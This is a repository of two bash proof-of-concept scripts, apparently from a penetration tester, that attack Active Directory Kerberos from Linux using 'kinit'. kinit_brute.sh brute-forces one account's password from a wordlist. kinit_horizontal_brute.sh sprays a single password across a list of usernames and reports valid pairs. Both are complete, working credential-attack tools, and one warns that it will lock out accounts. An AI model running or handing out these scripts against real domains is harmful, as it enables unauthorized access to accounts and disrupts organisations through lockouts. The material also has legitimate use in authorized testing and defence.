├── README.md
├── kinit_brute.sh
└── kinit_horizontal_brute.sh


/README.md:
--------------------------------------------------------------------------------
1 | # kerberos_windows_scripts
2 | Collection of scripts for interacting with AD Kerberos from Linux
3 | 


--------------------------------------------------------------------------------
/kinit_brute.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Title: kinit_brute.sh
 4 | # Author: @ropnop
 5 | # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
 6 | # The script configures the realm and KDC for you based on the domain provided and the domain controller
 7 | # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
 8 | # Only tested with Heimdal kerberos (error messages might be different for MIT clients)
 9 | # Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
10 | 
11 | 
12 | USERNAME=$1
13 | DOMAINCONTROLLER=$2
14 | WORDLIST=$3
15 | 
16 | if [[ $# -ne 3 ]]; then
17 | 	echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file"
18 | 	echo "[!] Example: ./kinit_brute.sh ropnop@contoso.com dc01.contoso.com passwords.txt"
19 | 	exit 1
20 | fi
21 | 
22 | DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}')
23 | 
24 | echo "[+] User: $USERNAME"
25 | echo "[+] Kerberos Realm: $DOMAIN"
26 | echo "[+] KDC: $DOMAINCONTROLLER"
27 | echo ""
28 | 
29 | k5config=$(mktemp)
30 | k5cache=$(mktemp)
31 | 
32 | cat > $k5config <<asdfasdf
33 | [libdefaults]
34 | 	default_realm = $DOMAIN
35 | [realms]
36 | 	$DOMAIN = {
37 | 		kdc = $DOMAINCONTROLLER
38 | 		admin_server = $DOMAINCONTROLLER
39 | 	}
40 | asdfasdf
41 | 
42 | while read PASSWORD; do
43 | 	RESULT=$(
44 | 	echo $PASSWORD | KRB5_CONFIG=$k5config KRB5CCNAME=$k5cache kinit --password-file=STDIN $USERNAME 2>&1
45 | 	)
46 | 	if [[ $RESULT == *"unable to reach"* ]]; then
47 | 		echo "[!] Unable to find KDC for realm. Check domain and DC"
48 | 		exit 1
49 | 	fi
50 | 	if [[ $RESULT == *"Wrong realm"* ]]; then
51 | 	       echo "[!] Wrong realm. Make sure domain and DC are correct"
52 |      	       exit 1
53 |         fi
54 | 	if [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
55 | 		echo "[!] Account locked out!"
56 | 		exit 1
57 | 	fi
58 | 	if [[ $RESULT == *"Password incorrect"* ]]; then
59 | 		:
60 | 	elif [[ -z "$RESULT" ]]; then
61 | 		echo "[+] Found password: $PASSWORD"
62 | 		echo ""
63 | 		exit 1
64 | 	else
65 | 		echo "[+] Error: $RESULT"
66 | 	fi
67 | done <$WORDLIST
68 | 


--------------------------------------------------------------------------------
/kinit_horizontal_brute.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Title: kinit_user_brute.sh
 4 | # Author: @ropnop
 5 | # Description: This is a PoC for doing horiztonal password sprays using 'kinit' to try to check out a TGT from a Domain Controller
 6 | # The script configures the realm and KDC for you based on the domain provided and the domain controller
 7 | # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
 8 | # Only tested with Heimdal kerberos (error messages might be different for MIT clients)
 9 | 
10 | 
11 | DOMAIN=$1
12 | DOMAINCONTROLLER=$2
13 | WORDLIST=$3
14 | PASSWORD=$4
15 | 
16 | if [[ $# -ne 4 ]]; then
17 | 	echo "[!] Usage: ./kinit_user_brute.sh <domain> <domain controller> <username list> <password>"
18 | 	echo "[!] Example: ./kinit_user_brute.sh contoso.com dc1.contoso.com usernames.txt Password123"
19 | 	exit 1
20 | fi
21 | 
22 | DOMAIN=$(echo $DOMAIN | awk '{print toupper($0)}')
23 | 
24 | echo "[+] Kerberos Realm: $DOMAIN"
25 | echo "[+] KDC: $DOMAINCONTROLLER"
26 | echo ""
27 | 
28 | k5config=$(mktemp)
29 | k5cache=$(mktemp)
30 | 
31 | cat > $k5config <<asdfasdf
32 | [libdefaults]
33 | 	default_realm = $DOMAIN
34 | [realms]
35 | 	$DOMAIN = {
36 | 		kdc = $DOMAINCONTROLLER
37 | 		admin_server = $DOMAINCONTROLLER
38 | 	}
39 | asdfasdf
40 | 
41 | START_TIME=$SECONDS
42 | COUNT=0
43 | 
44 | while read USERNAME; do
45 | 	USERNAME=$(echo $USERNAME | awk -F@ '{print $1}')
46 | 	RESULT=$(
47 | 	echo $PASSWORD | KRB5_CONFIG=$k5config KRB5CCNAME=$k5cache kinit --password-file=STDIN $USERNAME 2>&1
48 | 	)
49 | 	if [[ $RESULT == *"unable to reach"* ]]; then
50 | 		echo "[!] Unable to find KDC for realm. Check domain and DC"
51 | 		exit 1
52 | 	elif [[ $RESULT == *"Wrong realm"* ]]; then
53 | 	       echo "[!] Wrong realm. Make sure domain and DC are correct"
54 |      	       exit 1
55 | 	elif [[ $RESULT == *"Clients credentials have been revoked"* ]]; then
56 | 		echo "[!] $USERNAME is locked out!"
57 | 	elif [[ $RESULT == *"Client"* ]] && [[ $RESULT == *"unknown"* ]]; then
58 | 		# username does not exist
59 | 		: # pass
60 |   elif [[ $RESULT == *"Password incorrect"* ]]; then
61 |     # password incorrect
62 |     : #pass
63 | 	elif [[ -z "$RESULT" ]]; then
64 | 		echo "[+] Valid: $USERNAME@$DOMAIN : $PASSWORD"
65 | 	else
66 | 		echo "[+] Error trying $USERNAME: $RESULT"
67 | 	fi
68 | 	COUNT=$(($COUNT+1))
69 | done <$WORDLIST
70 | 
71 | echo ""
72 | echo "Tested \"$PASSWORD\" against $COUNT users in $(($SECONDS - $START_TIME)) seconds"
73 | echo ""
74 | 


--------------------------------------------------------------------------------